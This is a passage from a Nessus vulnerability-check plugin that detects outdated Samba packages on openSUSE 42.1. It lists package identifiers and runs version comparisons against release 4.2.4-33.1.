script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libgensec-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo-32bit\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ctdb-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ctdb-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ctdb-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ctdb-tests-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ctdb-tests-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", 
reference:\"libdcerpc-atsvc-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-atsvc0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-atsvc0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-binding0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-binding0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-samr-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-samr0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc-samr0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libdcerpc0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libgensec-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libgensec0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libgensec0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-krb5pac-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-krb5pac0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-krb5pac0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-nbt-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-nbt0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-nbt0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", 
reference:\"libndr-standard-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-standard0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr-standard0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libndr0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libnetapi-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libnetapi0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libnetapi0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libregistry-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libregistry0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libregistry0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-credentials-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-credentials0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-credentials0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-hostconfig-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-hostconfig0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-hostconfig0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-passdb-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-passdb0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-passdb0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-policy-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", 
reference:\"libsamba-policy0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-policy0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-util-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-util0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamba-util0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamdb-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamdb0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsamdb0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbclient-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbclient-raw-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbclient-raw0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbclient-raw0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbclient0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbclient0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbconf-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbconf0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbconf0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbldap-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbldap0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libsmbldap0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libtevent-util-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libtevent-util0-4.2.4-33.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libtevent-util0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libwbclient-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libwbclient0-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libwbclient0-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-client-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-client-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-core-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-debugsource-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-libs-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-libs-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-pidl-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-python-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-python-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-test-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-test-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-test-devel-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-winbind-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"samba-winbind-debuginfo-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc-atsvc0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", 
reference:\"libdcerpc-atsvc0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libdcerpc0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libgensec0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libgensec0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr-nbt0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.2.4-33.1\") ) flag++;\nif ( 